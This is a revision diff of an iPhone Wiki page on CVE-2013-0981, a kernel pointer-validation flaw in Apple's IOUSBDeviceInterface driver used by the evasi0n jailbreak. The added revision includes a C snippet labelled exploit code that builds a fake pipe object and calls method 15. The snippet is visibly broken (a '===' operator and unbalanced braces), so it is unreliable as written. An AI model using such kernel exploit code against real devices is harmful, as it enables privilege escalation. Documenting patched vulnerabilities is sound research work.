Difference between revisions of "IOUSBDeviceFamily Vulnerability"

From The iPhone Wiki
Jump to: navigation, search
m (References: mention ATV link too)
(One intermediate revision by one other user not shown)
Line 1: Line 1:
  +
The '''IOUSBDeviceFamily''' vulnerability has a CVE ID of [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0981 CVE-2013-0981].
This is CVE-2013-0981.
 
This kernel vulnerability comes from the <code>com.apple.iokit.IOUSBDeviceInterface</code> driver. There are several methods that accept a pipe object pointer from user space, but do not validate the pointer except for testing if it is non-null. An application that can communicate with USB devices (holding <code>com.apple.security.device.usb</code> [[entitlement]]) can call IOUSBDeviceInterface functions directly and give them a malformed pipe object which can result in arbitrary code execution if the memory referenced by the given pip object pointer can be controlled from user space. [[evasi0n]] uses function 15 (stallPipe) for exploitation.
 
   
  +
This kernel vulnerability comes from the <code>com.apple.iokit.IOUSBDeviceInterface</code> driver. There are several methods that accept a pipe object pointer from user space, but do not validate the pointer except for testing if it is non-null. An application that can communicate with USB devices (holding <code>com.apple.security.device.usb</code> entitlement) can call IOUSBDeviceInterface functions directly and give them a malformed pipe object which can result in arbitrary code execution if the memory referenced by the given pip object pointer can be controlled from user space. [[evasi0n]] uses function 15 (stallPipe) for exploitation.
TODO: Describe [[evasi0n]] exploitation in detail here.
 
  +
This is an implementation of the exploit code.
  +
<code>
  +
void exploit_kern_612(void)
  +
{
  +
kern_return_t ret;
  +
CFMutableDictionaryRef lol = IOServiceMatching( "IOUSBDeviceInterface" );
  +
if( lol != NULL )
  +
{
  +
io_connect_t connect;
  +
io_service_t io_service = IOServiceGetMatchingService( kIOMasterPortDefault, lol );
  +
ret = IOServiceOpen( io_service, mach_task_self(), 0, &connect );
  +
  +
// check if this bs works
  +
if(ret === KERN_SUCCESS)
  +
{
  +
uint32_t fakr[100] = {0};
  +
fakr[0x28/4] = 1;
  +
fakr[0x8/4] = (uint32_t)fakr;
  +
fakr[0x20/4] = 0;
  +
fakr[0x50/4] = (uint32_t)fakr;
  +
fakr[0] = (uint32_t)fakr;
  +
fakr[0x70/4] = 0x12345678;
  +
// fakr
  +
  +
uint64_t lel_again = (uint32_t)fakr;
  +
IOConnectCallMethod(connect, 15, &lel_again, 1, NULL, 0, NULL, NULL, NULL, NULL);
  +
}
  +
}
  +
}
  +
}
  +
</code>
   
 
Apple's description in the iOS 6.1.3 security fixes:
 
Apple's description in the iOS 6.1.3 security fixes:
Line 16: Line 46:
   
 
== References ==
 
== References ==
* [http://iphonedevwiki.net/index.php/IOUSBDeviceFamily IOUSBDeviceFamily on iphonedevwiki] (missing in this wiki!)
+
* [http://iphonedevwiki.net/index.php/IOUSBDeviceFamily IOUSBDeviceFamily on iPhone Dev Wiki]
 
* [http://blog.azimuthsecurity.com/2013/02/from-usr-to-svc-dissecting-evasi0n.html Analysis by kernelpool]
 
* [http://blog.azimuthsecurity.com/2013/02/from-usr-to-svc-dissecting-evasi0n.html Analysis by kernelpool]
 
* [http://support.apple.com/kb/HT5704 Apple's iOS 6.1.3 security fixes]
 
* [http://support.apple.com/kb/HT5704 Apple's iOS 6.1.3 security fixes]
 
* [http://support.apple.com/kb/HT5702 Apple's iOS 5.2.1 (Apple TV) security fixes]
 
* [http://support.apple.com/kb/HT5702 Apple's iOS 5.2.1 (Apple TV) security fixes]
 
* [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0981 NIST Reference CVE-2013-0981]
 
* [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0981 NIST Reference CVE-2013-0981]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0981 Mitre Reference CVE-2013-0981]
 
   
 
[[Category:Exploits]]
 
[[Category:Exploits]]

Revision as of 17:42, 9 March 2017

The IOUSBDeviceFamily vulnerability has a CVE ID of CVE-2013-0981.

This kernel vulnerability comes from the com.apple.iokit.IOUSBDeviceInterface driver. There are several methods that accept a pipe object pointer from user space, but do not validate the pointer except for testing if it is non-null. An application that can communicate with USB devices (holding com.apple.security.device.usb entitlement) can call IOUSBDeviceInterface functions directly and give them a malformed pipe object which can result in arbitrary code execution if the memory referenced by the given pip object pointer can be controlled from user space. evasi0n uses function 15 (stallPipe) for exploitation. This is an implementation of the exploit code.

void exploit_kern_612(void)
{
   kern_return_t ret;
   CFMutableDictionaryRef lol = IOServiceMatching( "IOUSBDeviceInterface" );
   if( lol != NULL )
      {
          io_connect_t connect;
          io_service_t io_service = IOServiceGetMatchingService( kIOMasterPortDefault, lol );
          ret = IOServiceOpen( io_service, mach_task_self(), 0, &connect );
          
          // check if this bs works
          if(ret === KERN_SUCCESS)
          {
                uint32_t fakr[100] = {0};
                fakr[0x28/4] = 1;
                fakr[0x8/4]  = (uint32_t)fakr;
                fakr[0x20/4] = 0;
                fakr[0x50/4] = (uint32_t)fakr;
                fakr[0]      = (uint32_t)fakr;
                fakr[0x70/4] = 0x12345678;
                // fakr

                uint64_t lel_again = (uint32_t)fakr;
                IOConnectCallMethod(connect, 15, &lel_again, 1, NULL, 0, NULL, NULL, NULL, NULL);
      }
    }
  }
} 

Apple's description in the iOS 6.1.3 security fixes:

USB
Impact: A local user may be able to execute arbitrary code in the kernel
Description: The IOUSBDeviceFamily driver used pipe object pointers that came from userspace. This issue was addressed by performing additional validation of pipe object pointers.

See also

References